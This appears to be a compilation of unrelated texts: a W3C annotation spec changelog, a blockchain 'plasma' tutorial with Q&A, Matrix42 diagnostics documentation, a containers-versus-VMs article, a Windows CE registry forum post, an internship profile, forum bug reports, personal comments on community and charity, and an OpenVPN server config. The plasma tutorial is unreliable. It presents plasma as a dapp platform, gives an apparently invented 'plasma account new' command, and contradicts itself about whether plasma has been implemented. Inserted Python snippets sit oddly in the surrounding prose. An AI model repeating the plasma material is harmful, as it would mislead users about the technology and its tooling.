This specification builds upon the work from many previous annotation efforts, including in particular: The editors would like to acknowledge the financial support of the Andrew W. Mellon Foundation for the Open Annotation Collaboration and for funding the initial reconciliation between the Annotation Ontology and Open Annotation Collaboration models.
| Date | Editor | Description |
|---|---|---|
| 2013-02-08 | rsanderson | Namespace change for W3C best practice |
| 2013-02-05 | rsanderson | W3C Community Draft 2 |
| 2013-01-28 | rsanderson | W3C Community Draft 2 (internal for final review) |
| 2013-01-07 | rsanderson | W3C Community Draft 2 (internal for review) |
| 2012-05-01 | rsanderson | W3C Community Draft |
| 2012-04-05 | rsanderson | Internal Draft 2 |
| 2012-03-30 | rsanderson | Internal Draft 1 |
If you're looking to use plasma in your blockchain application, there are a few things you need to know. First, plasma is a decentralized application platform that allows you to build and run decentralized applications, or dapps. Second, plasma is built on top of the Ethereum blockchain, so you'll need to have a basic understanding of Ethereum and smart contracts before you can start using plasma. Finally, plasma is still in its early stages of development, so there may be some bugs and issues that you need to be aware of.

Assuming you have a basic understanding of Ethereum and smart contracts, let's get started with using plasma in your blockchain application. The first thing you need to do is install the plasma client. The easiest way to do this is by using the command line interface (CLI). Once you have the plasma client installed, you'll need to create a new account. You can do this by running the command "plasma account new". Once you have your account set up, you'll need to deposit some Ether into it. You can do this by sending Ether to the address that was generated when you ran the "plasma account new" command.

Once your Ether is deposited, you'll need to create a smart contract. A smart contract is a piece of code that runs on the Ethereum blockchain. There are a few different ways to create a smart contract, but the easiest way is to use the online editor at https://remix.ethereum.org. Once you have your smart contract written, you'll need to compile it and deploy it to the Ethereum blockchain.

Once your smart contract is deployed, you'll need to interact with it to start using plasma. The easiest way to do this is by using the web3.js library. You can find more information about web3.js at https://web3js.readthedocs.io. Once you have web3.js installed, you'll need to write some code to interact with your smart contract. The code will vary depending on what your smart contract does, but you can find an example below.
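The article's own example is not included, so as an illustration of what "interacting with a smart contract" means at the wire level, here is a hedged stdlib-only Python sketch: libraries like web3.js ultimately POST JSON-RPC requests such as eth_call to the node's RPC endpoint (commonly http://localhost:8545). The contract address and calldata below are placeholders, not a real contract.

```python
import json

def eth_call_request(contract_address, call_data, request_id=1):
    """Build a JSON-RPC eth_call request body for a read-only
    contract call. `call_data` is the ABI-encoded function selector
    plus arguments; "latest" asks for the latest block's state."""
    return json.dumps({
        "jsonrpc": "2.0",
        "method": "eth_call",
        "params": [{"to": contract_address, "data": call_data}, "latest"],
        "id": request_id,
    })

# Placeholder values, for illustration only:
example_body = eth_call_request("0x" + "00" * 20, "0x")
```

In practice you would POST this body to your node's RPC endpoint with an HTTP client; web3.js (or web3.py) wraps this plumbing, plus the ABI encoding of the call data, behind a contract object.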
Once you have your code written, you'll need to run it on a computer that has an Ethereum node running. You can find instructions on how to set up an Ethereum node at https://github.com/ethereum/go-ethereum/wiki/Getting-Started. Once your code is running and you're able to interact with your smart contract, you're ready to start using plasma in your blockchain application!

Other related questions:

Q: How does plasma work blockchain?
A: Plasma is a Layer 2 scaling solution for Ethereum that enables users to transact with each other without having to wait for confirmations on the main Ethereum blockchain. Plasma is comprised of a network of child chains that are connected to the main Ethereum blockchain. These child chains can process transactions much faster than the main Ethereum blockchain and can also be used to create new tokens.

Q: How does Ethereum plasma work?
A: Plasma is a proposed framework for scaling the Ethereum blockchain that would enable it to process a much larger number of transactions than it can currently handle. Plasma is similar to the Lightning Network, a proposed solution for scaling the Bitcoin blockchain. Plasma is designed to work in two layers. The first layer is the "root chain", which is the main Ethereum blockchain. The second layer is the "Plasma chain", which is a side chain that is attached to the root chain. The Plasma chain can be used to process transactions that are not critical or time-sensitive. This would allow the root chain to be used for more important transactions, while the Plasma chain handles the less important ones. Plasma chains can be created by anyone. They can be created for any purpose, such as handling transactions for a specific country or region, or for a specific industry. The Plasma framework is still in the early stages of development and has not been implemented on the Ethereum blockchain yet.

Q: What do plasma solutions use to create an additional chain to the main blockchain?
A: There is no one-size-fits-all answer to this question, as the specific plasma solution used will determine what mechanism is used to create an additional chain. However, some common methods used include creating a new block header that includes a reference to the previous block on the main chain, or using a sidechain that is pegged to the main chain.

Q: What is plasma token?
A: A Plasma token is a digital asset that is used to represent a stake in a Plasma chain. Plasma tokens can be used to pay fees, vote on governance decisions, and block or challenge invalid transactions.
When something does not work and you can't understand why, run the system health check and check the log files. System Administrators can run the System Diagnostics and Download Server Logs from the Administration application homepage.

The "System Diagnostics" action can be executed by Administrators from the Administration application → Home landing page by clicking on the corresponding button. A check of many system components will be executed, and any issue that is present will be shown. The following states are possible:

We highly recommend fixing issues and having the System Diagnostics pass all the validation rules with Success, to be sure the system is working correctly. In case of an error or warning, click on the checked item and scroll down to the Details section for more information. Fix the issues and re-run the System Diagnostics.

System Diagnostics checks the following items and system components:

| # | Verified component | Comments & Useful Links |
|---|---|---|
| 1 | Verify that windows service 'Matrix42 Engine Common' is running | System Components: Windows Services |
| 2 | Verify that windows service 'Matrix42 Engine Common X86' is running | System Components: Windows Services |
| 3 | Verify that windows service 'Matrix42 Engine Scheduler' is running | System Components: Windows Services |
| 4 | Verify that windows service 'Matrix42 Data Gateway' is running | System Components: Windows Services |
| 5 | Verify that windows service 'Message Queuing' is running | Windows Services |
| 6 | Verify that windows service 'Net.Msmq Listener Adapter' is running | Windows Services |
| 7 | Verify that windows service 'Net.Pipe Listener Adapter' is running | Windows Services |
| 8 | Verify that windows service 'Net.Tcp Listener Adapter' is running | Windows Services |
| 9 | Verify that windows service 'Net.Tcp Port Sharing Service' is running | Windows Services |
| 10 | Verify that any Matrix42 Worker is running | Matrix42 Worker Engine |
| 11 | Serious delays in processing Workflows operations | Matrix42 Worker Engine |
| 12 | Verify that the Email Engine is active | Email Engine and Designer |
| 13 | Verify that Workflow Engine on the Matrix42 Worker is running | Matrix42 Worker Engine: Matrix42 Workers & Workflows |
| 14 | Verify that all Compliance Rules use the Email Engine for sending emails | For warnings on this item, please consider adjusting the system as described on this page: Compliance Rules: switching to the new Email Engine |
| 15 | Verify that the Data Gateway on the Matrix42 Worker is running | For warnings on this item, please consider adjusting the system as described on this page: Matrix42 Worker Engine: Using Matrix42 Workers as Data Gateway |
| 16 | Verify that windows service 'AppFabric Workflow Management Service' is running | Windows Services |
| 17 | Verify that windows service 'AppFabric Workflow Management Service' is running under an account in the AppFabric Security group | Windows Services |
| 18 | Verify that windows service 'AppFabric Event Collection Service' is running under an account in the AppFabric Security group | Windows Services |
| 19 | Verify that windows service 'AppFabric Event Collection Service' is running | Windows Services |
| 20 | Verify that AppFabric Security is configured correctly | Workflow Engine: AppFabric |
| 21 | Verify released Workflows are compatible with the Worker | For warnings on this item, please consider adjusting the system as described on this page: Workflow Engine Migration Guide. See also Manage Workflows: Runs on AppFabric |
| 22 | Verify connection to database 'Archive' | History Wizard |
| 23 | Verify connection to database 'Datawarehouse' | Data for license management reports |
| 24 | Verify connection to database 'Database File Storage' | |
| 25 | Verify that windows service 'Web Deployment Agent Service' is running | Windows Services |
| 26 | Verify connection to database 'Workflow Monitoring' | Workflow Instances Activity Monitoring |
| 27 | Verify connection to database 'Workflow Persistence' | Workflow Engine: Persistence |
| 28 | Verify Workflow activations | Workflows: Publish action |
|29||Verify Workflow Engine to start workflow synchronously||Workflow Engine| |30||Verify Workflow Engine to start workflow asynchronously||Workflow Engine| |31||Verify Workflow Instance running on Matrix42 Worker||Workflow Instances Activity Monitoring: Runs on AppFabric| |32||Verify that present Workflow Instances are valid||Workflow Instances Activity Monitoring| |33||Verify connectors configurations||Connectors Overview: Connectors Delivered with Matrix42 products| |34||Service Connections validation||Service Connections| |35||Validating display expressions| |36||Validating dynamic structures| |37||Validating GDIE rules||Generic Data Import Export| |38||Validating grid layouts| |39||Validating quick filters||Quick Filters| |40||Validating structures||Navigation Items: Structures| |41||Verify that reports are accessible.||Reports| Starting with DWP v.11.0 all system components check related to the Data Gateway, AppFabric, and legacy Alerting Engine for Compliance Rules (see items #14-20) will not be present in the System Diagnostics. System Status dashboard is shown on the Administration home page. System Status is run automatically when the home page of the Administration application is opened for the first time and is automatically refreshed every 3 hours after the last automatic check: Click on the Run System Diagnostics action to update the System Status dashboard manually. The dashboard shows when the last check has been run and a summary of the found issues of the following types: For more details on the found issues, click on the checked item: Download system logs It is possible to download logs from the application, without directly accessing the Application Server. This can be done by clicking on the Administration application → Home → Download Server Logs button: All Server Logs are downloaded locally to your device in a .zip archive. You can also check specific logs from the Application Server. 
In the default setup, log files are located in the C:\Program Files\Matrix42\Matrix42 Workspace Management\Logs\ directory. For more information on the log file types, see also the System Components: Web Application section of the page.
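The "check log files" advice above can be partly automated. Below is a minimal sketch (not a Matrix42 tool; the `.log` extension and the `ERROR` marker are assumptions about the log format) that walks a log directory and collects lines containing an error marker:

```python
import os

def scan_logs_for_errors(log_dir, marker="ERROR"):
    """Walk a log directory and collect lines containing the given marker.

    Returns a dict mapping log file name -> list of matching lines.
    """
    hits = {}
    for root, _dirs, files in os.walk(log_dir):
        for name in files:
            if not name.lower().endswith(".log"):
                continue  # only look at log files
            path = os.path.join(root, name)
            with open(path, errors="replace") as fh:
                matches = [line.rstrip() for line in fh if marker in line]
            if matches:
                hits[name] = matches
    return hits
```

Pointing it at the Logs directory mentioned above (e.g. `scan_logs_for_errors(r"C:\Program Files\Matrix42\Matrix42 Workspace Management\Logs")`) gives a quick overview of which components reported errors before digging into individual files.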
OPCFW_CODE
What Exactly Is a Virtualized Container?

Tech giants like Google, Microsoft and IBM have all invested heavily in virtualized containers. In its most basic definition, a container is an OS-level virtualization method for executing and running applications. Containers eliminate the need to launch an entire virtual machine for every application: they run isolated on a single control host and share a single kernel. In IT circles, you may have heard the name Docker on more than one occasion. Docker is the leading provider of enterprise-level containers. LXC is another big name in virtual container provisioning.

What About a Virtual Machine (VM)?

A VM allows users to run an operating system in an app window on a desktop. The VM acts like a full, separate computer complete with its own virtualized hardware. This enables you to experiment with different operating systems, software and apps – all in a safe, sandboxed environment. VMs run on firmware, software or hardware called a hypervisor. The hypervisor itself runs on a physical computer – also known as a "host machine" – that provides the VM with resources like RAM and CPU. Multiple VMs can run on a single host machine, with resources distributed as users see fit.

Which One Is Better?

Containers are a newer concept, and many argue they hold several advantages over VMs. The latter consume more resources: each VM runs a full copy of an operating system (OS), as well as a virtual copy of all the hardware the OS needs, which eats up quite a bit of RAM and CPU. Containers, by contrast, require just enough of an OS, libraries and other system resources to run a specific program, and can generally squeeze in about two to three times the number of applications as a VM. Modern containers also run in the cloud, giving users a portable operating environment for deploying, developing and testing new systems. Containers are the clear winner then, right? Well, not exactly. VMs do hold certain advantages.
VMs are simple and easy to create for someone with a fair degree of IT literacy. Developers can just install whatever OS they need and get straight to work, and there is very little learning curve. With easily accessible software on the market, you can also easily return to an earlier iteration of an OS or clone a new OS entirely. For enterprises and SMBs, however, containers may still be preferable. Containers use much less hardware, making them ideal for running multiple instances of a single application, service or web server. Containers also do what VMs do without a hypervisor, resulting in faster resource provisioning and speedier availability of new applications. If you think you can benefit from a single service that can be clustered and deployed at scale, then containers may be the better option. But, in the big scheme of things, in no way do containers make VMs obsolete. Containers simply provide a new solution for improving overall IT efficiency in specific areas of operation. The best approach may be a hybrid one: not a full transition to containers, but implementing them alongside VMs so users can capitalize on the respective advantages of each. At the end of the day, every organization's business needs and infrastructure are different and require their own unique strategy. So, as cliché as it may sound, you be you… Download this informative eBook from our partner, HPE, and learn why application container technology is a critical piece of IT modernization solutions that will drive digital transformation, hybrid environment adoption and hyper-convergence. topic: containers vs. vms
OPCFW_CODE
We have some problems restoring the date/time settings after clearing the registry. What we are doing now is:

- make a backup of some registry settings (see below)
- clear the registry (Upd_RegistryClear)
- restore the registry settings
- save the registry (Upd_RegistrySave)

Timezone and daylight saving settings are restored correctly, but the time is not:

- When the timezone "(UTC) Coordinated Universal Time" is set, the time is off by -8 hours.
- When the default timezone "(UTC-08:00) Pacific time (US & Canada)" is set, the time is correct.
- When the timezone "(UTC+01:00) Amsterdam, Berlin, …" is set, the time is off by -9 hours.

How do we restore the date/time settings correctly? Do we have to call "rtcsync" after restoring the registry keys?

These are the date/time related registry settings we are saving/restoring:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Clock]
"AutoDST"=dword:00000001

[HKEY_LOCAL_MACHINE\Time]
"TimeZoneInformation"=hex:5C,FE,FF,FF,57,00,2E,00,20,00,4D,00,6F,00,6E,00,67,\
00,6F,00,6C,00,69,00,61,00,20,00,53,00,74,00,61,00,6E,00,64,00,61,00,72,00,\
64,00,20,00,54,00,69,00,6D,00,65,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,09,00,05,00,05,00,17,00,3B,00,3B,00,E7,03,00,00,00,00,57,00,2E,00,\
20,00,4D,00,6F,00,6E,00,67,00,6F,00,6C,00,69,00,61,00,20,00,44,00,61,00,79,\
00,6C,00,69,00,67,00,68,00,74,00,20,00,54,00,69,00,6D,00,65,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,03,00,06,00,05,00,02,00,00,00,00,00,00,\
00,C4,FF,FF,FF
"TZID"=dword:00000785

The registry keys were taken from Time and Date Registry Settings (Compact 2013).

In case you're wondering why we want to do this: it is part of our application update process. Our application is integrated in the OS image, so we have to update the OS whenever we want to update our application. We'd like to reset all registry keys to their default values, except those which might have been changed by our application.
The only way I see is to back up "our" registry settings, update the OS, clear the registry, and restore "our" registry settings after a reboot. Or is there an easier way?
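For what it's worth, the three observations fit one simple pattern: the displayed local time stays at the value that was set under the default Pacific zone, and only the definition of "correct" local time moves with the restored TimeZoneInformation. The sketch below is a speculative model of the symptom, not a verified description of the Compact 2013 kernel:

```python
# Speculative model (an assumption, not verified against the CE kernel):
# the device keeps displaying the local time set under the default zone
# (UTC-08:00 Pacific); restoring TimeZoneInformation only changes what
# the *correct* local time would be, so the error is old minus new offset.

OLD_OFFSET_HOURS = -8  # default zone: (UTC-08:00) Pacific

def apparent_error_hours(new_offset_hours):
    """Displayed minus correct local time, in hours, if local time is
    never re-derived from UTC after the registry restore."""
    return OLD_OFFSET_HOURS - new_offset_hours

# Reproduces all three observations from the report:
assert apparent_error_hours(0) == -8    # "(UTC) Coordinated Universal Time"
assert apparent_error_hours(-8) == 0    # Pacific: time is correct
assert apparent_error_hours(+1) == -9   # "(UTC+01:00) Amsterdam, Berlin, ..."
```

If this model holds, rewriting the registry keys alone is not enough: the system also has to be told to recompute local time from UTC afterwards, which is exactly what the "do we have to call rtcsync" question is getting at.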
OPCFW_CODE
I am +1 on Step 1 being most important and most difficult here. I would also say I am just okay at it, because connecting with other introverted people is difficult for me and I won't necessarily get far enough into conversation to find out about a lot of people's interests unless they have much in common with me or there's someone outgoing to carry the conversation. (There are many people more naturally inclined to be outgoing who could become amazing at connecting people if they realized that they have tons of this sort of knowledge that other people who are not like them don't obtain.) But deliberately putting yourself in positions where you're going to learn a lot of things about people helps. Organizing groups, speaking about interesting topics, following everyone and their dog on social media, etc. And then being genuinely interested in them, enough that you remember things about them and they enjoy sharing things with you.

"All This Time", by Jonathan Coulton. Video for the first song from his new future-themed album, placed in this category because the text-adventure video adds to the story. (Song name-checks Kurzweil and is about our future robot overlords.)

Some of this reminds me of a talk by Sumana Harihareswara, a friend of mine in the free software community, where she tries to examine which strange and offputting things are necessary and which are needlessly driving people away: Inessential Weirdnesses in Free Software. I think there are in fact a lot of parallels between issues in free software and the rationalist community--similarly devaluing Hufflepuff skills even when they're necessary to get the full value out of everyone's contributions, similarly having concerns about not watering down the core philosophical commitments while still being open to newcomers and people who are not yet committed to the entire culture.
(FWIW, I am a weakly-connected member of the Bay Area rationalist community--it's not what I think of as my primary community so I'm not particularly present.) This would probably have to be less expensive long-term and at least as convenient as my current living situation (apartment in the south bay) for my partner and me to be interested, but it is something I think we would consider. (I would be more interested in the social group aspect, and he would want low social obligation but would be interested in resource-sharing. I have not yet actually asked him about this post.) In particular, there are plenty of things that are reasonable and useful if shared in small groups (tools, recreation equipment, etc.) but a bit silly for personal use and difficult to share with strangers. I am not interested enough to do the heavy lifting of initial organizing. (I do like the idea of having neighbors pre-selected to be inclined to be "neighborly"--I am happy to watch a child/water plants/play in your garage band/copyedit your report if you will do similar things when I need it. I know little enough about most of my current physical neighbors that we don't know what we can ask of each other.)

Took the poll.

In general, don't optimize for uniqueness or quirkiness; you have limited space and your potential workplace is probably using the resume to screen for "does this person meet enough of the basic desired qualities that we should find out more about them with an interview". You can add a few small things if they really set you apart, but don't go out of your way to do it. A better opportunity to do this is in your cover letter. The best reference for workplace norms and job-hunting advice that I know is Ask A Manager; you may want to browse her archives.

The recent East Bay solstice was my first one.
(I'm not usually enthusiastic about rituals or very large social events where I don't know many people--but I do enjoy singing with friendly people, so I came as part of the choir.) I was pleasantly surprised by how not odd it was. It felt quite a lot like other ritual-type events I've gone to--church services, memorial events, formulaic holiday celebrations, etc.: much reinforcing of common themes for the group and reference to shared values and oft-repeated material. It was not as in-groupy as I expected--I could have imagined taking a friend who was not part of the community and not needing to explain much about it; it was mostly appealing to the broadest part of the community rather than deep insider references. (And here I realize I still count myself as in the community even though my recent involvement is mostly passive!) I also appreciated the group activity of writing down meaningful encouragements and posting them on the wall: it gave a sense of who was in the room and the chance to show the best parts of themselves--and something easily visible to make conversation with strangers about during breaks. It did remind me of the sort of activity you might do at a company retreat, but the better kind! I wouldn't mind seeing that repeated. I wouldn't make a restricted donation to a charity unless there was a cause I really cared about but I didn't think the charity behind it was well-run and I didn't know a better way of helping that cause. I do not consider money to keep a good charity running as "wasted"--if anything I am deeply dubious of any charity which claims to have minimal to no administration costs, because it's either untrue (the resources to manage it effectively must come from somewhere, maybe from the founders' own personal resources) or a likely sign of bad management (they think that skimping on the funds needed to manage it effectively in the name of maximizing the basket of "program expenses" is a good organizational strategy). 
An organization that I think is well-run wants to spend on its cause as much as possible, but is mindful of needing to spend on itself also. If it cannot spend on itself--to hire good staff, to have good training, to use resources that cost money and save time, to plan its strategy and maintain regulatory compliance, to do whatever else an efficient organization needs to do--how can it possibly have the capacity to spend well on its programs? The money to sustain that charity is providing for its cause to be effectively addressed now and into the future. "Unrestricted" says that you believe GiveWell is competent to make these allocations correctly between itself and its recommended charities. For GiveWell in particular, if you do not believe they can do this, why do you think they can evaluate other charities' effectiveness? Presumably you want to give to the other charities because GiveWell has told you they are worth it, because you think GiveWell is competent at assessing organizational effectiveness. (For other charities, I would have lower expectations for assessment ability--but still I expect that I want to give to one in particular because it is effective at spending for its cause. There are few causes where you do not have much choice of how to direct your money to affect it. An effective one will be competent at running itself--not perfect surely, but competent enough that I don't think I will do a better job at allocating its funds than it will by giving a restricted donation.) Also, many people's gut feelings direct them to give restricted donations to avoid "wasting" their money; it's a feel-good option but one that does not help the charity stay around in the long term. People who are more considered should compensate for that by allowing the charity to use their funds unrestricted. 
I have no idea if GiveWell gets grants or not, but grant support from foundations is often restricted as well; it's much harder to get grants for general operating support. But I won't start that rant here. (For background, I've been heavily involved in nonprofits for the past 10 years, as volunteer, staff, and board.)

Also, logical reasoning of the type on the test hardly showed up at all in law school--most of the reasoning required was not very complicated, so most reasonably intelligent college graduates would already be able to do it. (Some more complicated logic showed up in Conflicts of Laws, also.)

1) I took it, but I didn't do much studying for it. (Basically, I signed up for it at nearly the very last moment after I saw someone mention that all it took to get into law school was a good LSAT--I had been pursuing a different career and had not previously thought of going to law school, but I had started doing legal-related work in a volunteer gig.) Maybe a week before the exam I went to the library and checked out a prep book. And the logic games section was already something I basically knew, so what I did spend time on was careful reading of the critical reading sections; I tend not to read carefully and miss instructions, and I wanted to learn the kinds of tricks they were likely to use to get me to do just that.

2 and 3) No; I used the logical reasoning skills I had already from studying math. (Also, from having taken every vaguely logic-related course at my undergrad.) Those were long-lasting. But I enjoyed math because many of those skills were already natural to me. I learned refinements and additional techniques and became better at it, but I was already inclined to thinking that way and enjoyed it.
As a lawyer now, one of my major strengths lies in analytical reasoning--I like to consider situations and take apart the possible situations that may arise, what happens if they're taken to their logical conclusions, where contradictions might arise from sets of terms, what logical inconsistencies exist in a proposal. (The biggest and most enjoyable project I've worked on has been license drafting.)
OPCFW_CODE
For university students, an internship is a great opportunity to develop professional skills in the workplace. Setec welcomes students of engineering and electronics to get work experience at the company and plays a vital part in fostering the innovative spirit of young professionals. Three of Setec's interns are now full-time employees, and they share their stories with us.

Hongli Wang, Electronics Engineer

Hongli Wang, Master of Engineering in electrical and electronics, graduated from the University of Melbourne. He spent three months at the company as a test engineer intern and later returned as a full-time employee. Hongli says that to become an intern, you need to apply for the internship program, satisfy some criteria including level of studies and average score, choose your field of interest, submit your CV and cover letter, and go through the interview process to secure a placement. His first task at Setec was making a switchbox for testing purposes, so he had to use his knowledge of software, such as Python scripting and Linux system setup, and acquire some new skills, like testing procedures, to perform this task. Currently Hongli is involved in developing computer vision for automated testing. Instead of testing products manually, the company will use a testing system that runs independently and generates a report on whether the product passes or fails the test. This will save time and further reduce possible testing errors. Hongli enjoys working in Setec's R&D team, where everyone is very helpful and open to your ideas.

Randi Noegroho, Electrical Engineer

Randi Noegroho, Master of Engineering at the University of Melbourne, studied electrical engineering. During the last semester of his studies, he chose an industry-based learning course, which he hoped would provide a smooth transition from university to professional life, and became an intern at Setec.
Randi's first task was testing the battery management system, obtaining and analysing data on a daily basis. Randi says: "At university, you learn a lot of very important fundamental stuff, but it's not enough. Communication is very important." At Setec, he could get his hands on real-life applications. Randi jumped at the opportunity to become a Setec employee because he realises that power electronics and control systems are a booming field, and he likes the company's culture. "All the people here are very supportive and encouraging. I am given big responsibility which pushes me further, so that I learn more and become a better person and professional." Currently Randi is involved in multiple projects in the challenging and dynamic world of R&D, and enjoys the diversity of his role.

Muzammil Patel, Embedded Software Engineer

Muzammil Patel is a fresh graduate of Swinburne University of Technology. During his three months as an embedded software intern at Setec, he made a strong impression on the R&D team and was offered a contract to work on a new and exciting project currently run by the company. As an intern at Setec, Muzammil learned a lot of things that he could not get his hands on while studying, especially in software development. What does he like about working in R&D? Muzammil's answer: "No one is constrained to their own work, people help each other anytime, you can always go and ask for advice." Muzammil is currently working on a project that allows updating firmware on the device via Bluetooth instead of updating it directly, which will save time, money and resources.

So if you are studying to be an engineer and looking for an internship program, Setec could be the place for you.
OPCFW_CODE
- Go to the View Unread Content page.
- Find a thread which has multiple pages and where the oldest unread post is not in the last page.
- Click the link which brings you to the oldest unread post.
- Don't continue to the last page of the thread.
- Reload the View Unread Content page again.
- The thread does not appear in the list even though you haven't read the last page yet.

"View Unread Content" does not handle multi-page threads nicely

Posted 23 December 2010 - 05:16 PM

Posted 02 February 2011 - 06:26 PM

Here's what happened:
- I went to the unread list.
- I opened some of the links in new tabs.
- I went to the second page of the unread list.
- I went back to the first page.
- I saw a thread (http://lavag.org/top...assing-cluster/) which had some new posts, but which I thought might have too many new posts.
- To check whether it was too long, I right clicked the OOP forum name next to the topic title and opened the forum in a new tab to see when the topic was started.
- At the same time, I refreshed the unread list page.
- When I looked at the other tab, the thread was marked as read and it no longer appeared in the unread list.

Posted 16 August 2011 - 07:52 AM

Posted 16 August 2011 - 11:34 PM

In any case here's a link to the initial release notes. And the subsequent bug fix release. If you want to post this directly to their bug tracker go here. Not sure if you can do this if you're not a customer but give it a shot.

Posted 17 August 2011 - 07:41 AM

Before I post this on their forums, I want to be sure we actually have the latest version. That's 3.2.0, right?

Posted 02 October 2012 - 10:56 AM

There's a thread with 4 new replies on page 1 and 8 new replies on page 2, for a total of 12 unread replies. If I click the First Unread Post bullet and don't go into page 2 manually, the topic disappears from the new content list, even though I haven't actually read page 2. If I just click the page 1 link in the new content list, the topic stays in the list until I actually go into page 2.

Posted 14 December 2012 - 09:18 PM

Posted 16 December 2012 - 09:07 AM
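The behavior reported in this thread can be modeled in a few lines. The class below is purely illustrative (an assumption about the forum software's read-marker bookkeeping, not its actual code), but it captures why the topic vanishes from the unread list:

```python
class Topic:
    """Toy model of a multi-page topic with a per-user read marker."""

    def __init__(self, total_pages):
        self.total_pages = total_pages
        self.last_read_page = 0  # 0 = nothing read yet

    def open_page(self, page):
        # Expected behavior: only pages actually visited count as read.
        self.last_read_page = max(self.last_read_page, page)

    def open_first_unread(self):
        # Buggy behavior reported above: following the "first unread
        # post" link moves the marker to the end of the topic, even
        # though only one page was actually displayed.
        self.last_read_page = self.total_pages

    def appears_in_unread_list(self):
        return self.last_read_page < self.total_pages
```

With a two-page topic, `open_first_unread()` makes `appears_in_unread_list()` return `False` even though page 2 was never opened, while `open_page(1)` correctly leaves the topic in the unread list, matching the two cases described in the 02 October 2012 post.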
OPCFW_CODE
class ray.tune.syncer.SyncConfig(upload_dir: Optional[str] = None, syncer: Optional[Union[str, ray.tune.syncer.Syncer]] = 'auto', sync_period: int = 300, sync_timeout: int = 1800, sync_on_checkpoint: bool = True)

Configuration object for Tune syncing. See Appendix: Types of Tune Experiment Data for an overview of what data is synchronized.

If an upload_dir is specified, both experiment and trial checkpoints will be stored on remote (cloud) storage. Synchronization then only happens via uploading/downloading from this remote storage – no syncing will happen between nodes.

There are a few scenarios where syncing takes place:

1. The Tune driver (on the head node) syncing the experiment directory to the cloud (which includes experiment state such as searcher state, the list of trials and their statuses, and trial metadata)
2. Workers directly syncing trial checkpoints to the cloud
3. Workers syncing their trial directories to the head node (this is the default option when no cloud storage is used)

See How to Configure Storage Options for a Distributed Tune Experiment? for more details and examples.

upload_dir – Optional URI to sync training results and checkpoints to (e.g. hdfs://path). Specifying this will enable cloud-based checkpointing.

syncer – If an upload_dir is specified, then this config accepts a custom syncer subclassing Syncer which will be used to synchronize checkpoints to/from cloud storage. If no upload_dir is specified, this config can be set to None, which disables the default worker-to-head-node syncing. Defaults to "auto" (auto-detect), which assigns a default syncer that uses pyarrow to handle cloud storage syncing when an upload_dir is specified.

sync_period – Minimum time in seconds to wait between two sync operations. A smaller sync_period will have more up-to-date data at the sync location but introduces more syncing overhead. Defaults to 5 minutes. Note: this applies to (1) and (3). Trial checkpoints are uploaded to the cloud synchronously on every checkpoint.

sync_timeout – Maximum time in seconds to wait for a sync process to finish running. This is used to catch hanging sync operations so that experiment execution can continue and the syncs can be retried. Defaults to 30 minutes. Note: currently, this timeout only affects cloud syncing: (1) and (2).

sync_on_checkpoint – If True, a sync from a worker's remote trial directory to the head node will be forced on every trial checkpoint, regardless of the sync_period. Defaults to True. Note: this is ignored if an upload_dir is specified, since this only applies to worker-to-head-node syncing (3).

PublicAPI: This API is stable across Ray releases.
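The sync_period semantics described above ("minimum time to wait between two sync operations", with sync_on_checkpoint forcing a sync regardless) can be sketched independently of Ray. The class below is illustrative only, not Ray's internal implementation:

```python
import time

class PeriodicSyncer:
    """Minimal illustration of sync_period semantics: a sync request is
    honored only if at least `sync_period` seconds have elapsed since
    the previous sync, unless it is forced (as with sync_on_checkpoint).
    """

    def __init__(self, sync_period=300.0, clock=time.monotonic):
        self.sync_period = sync_period
        self._clock = clock  # injectable clock makes the logic testable
        self._last_sync = float("-inf")  # so the first request always syncs

    def maybe_sync(self, force=False):
        now = self._clock()
        if force or now - self._last_sync >= self.sync_period:
            self._last_sync = now
            return True   # a real syncer would upload/download here
        return False      # throttled: too soon since the last sync
```

This makes the documented trade-off concrete: a smaller `sync_period` means `maybe_sync()` succeeds more often (fresher data at the sync location) at the cost of more sync operations.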
OPCFW_CODE
Although comedy is highly subjective, critics and viewers agree that some comedy films belong in every DVD collection. You can find a variety of comedy DVDs on eBay. Before shopping, learn about the top three comedies of all time.

'Monty Python and the Holy Grail'

'Monty Python and the Holy Grail' is a 1975 home-grown comedy by the Monty Python group of Graham Chapman, John Cleese, Terry Gilliam, Eric Idle, Terry Jones, and Michael Palin. They created the film during a break between series three and four of 'Monty Python's Flying Circus'. This is the group's first full-length film, and it is a cult classic. King Arthur and his squire Patsy, en route to Camelot, recruit the Knights of the Round Table: Sir Galahad the Pure, Sir Bedevere the Wise, Sir Lancelot the Brave, and Sir Robin the Not-Quite-So-Brave-As-Sir-Lancelot. Upon reaching Camelot, God instructs them to seek the Holy Grail. After attempting an attack on a French-controlled castle, the group separates and each knight embarks on his own quest to seek the Holy Grail.

'Airplane!'

'Airplane!' is a 1980 American film starring Robert Hays and Julie Hagerty. It is a farcical parody of the disaster film genre, specifically 'Zero Hour!' and 'Airport 1975'. Traumatised war veteran, ex-fighter pilot, and taxi driver Ted Striker suffers from a fear of flying and cannot hold a job. His flight attendant girlfriend, Elaine Dickinson, leaves him, and he boards a Boeing 707 from Los Angeles to Chicago in the hope of winning her back. After dinner, numerous passengers and the cockpit crew fall ill. It is up to Striker to land the plane and save the passengers and crew.

'Blazing Saddles'

Mel Brooks's 'Blazing Saddles' is a satirical Western starring Cleavon Little and Gene Wilder. Brooks, Andrew Bergman, Norman Steinberg, Al Uger, and comedic legend Richard Pryor wrote the script. The 1974 film satirises racism masked by Hollywood versions of the Wild West, and the hero is a black sheriff in a white town where everyone's surname is Johnson.
The government plans to build a railroad through the town of Rock Ridge, and State Attorney General Lamarr intends to drive out the townsfolk to buy their property cheaply. When he sends a gang of thugs to drive the inhabitants of Rock Ridge away, the people demand that the governor appoint a sheriff. Lamarr convinces the governor to appoint Bart, a black railway worker who is about to be hanged, in an effort to offend the townspeople into leaving, or to make them lynch the sheriff and allow him to take control of the town.
OPCFW_CODE
Code: Select all

port 1194
proto udp
dev tun
ca /etc/openvpn/keys/ca.crt # generated keys
cert /etc/openvpn/keys/myserver.crt
key /etc/openvpn/keys/myserver.key # keep secret
dh /etc/openvpn/keys/dh4096.pem
crl-verify /etc/openvpn/keys/crl.pem
server 192.168.12.0 255.255.255.0 # internal tun0 connection IP
ifconfig-pool-persist ipp.txt
keepalive 600 1800
comp-lzo # Compression - must be turned on at both ends
persist-key
persist-tun
status /var/log/openvpn/status.log
verb 3
link-mtu 1602
cipher AES-256-CBC
auth SHA512
keysize 256
push "dhcp-option DNS 192.168.12.1"
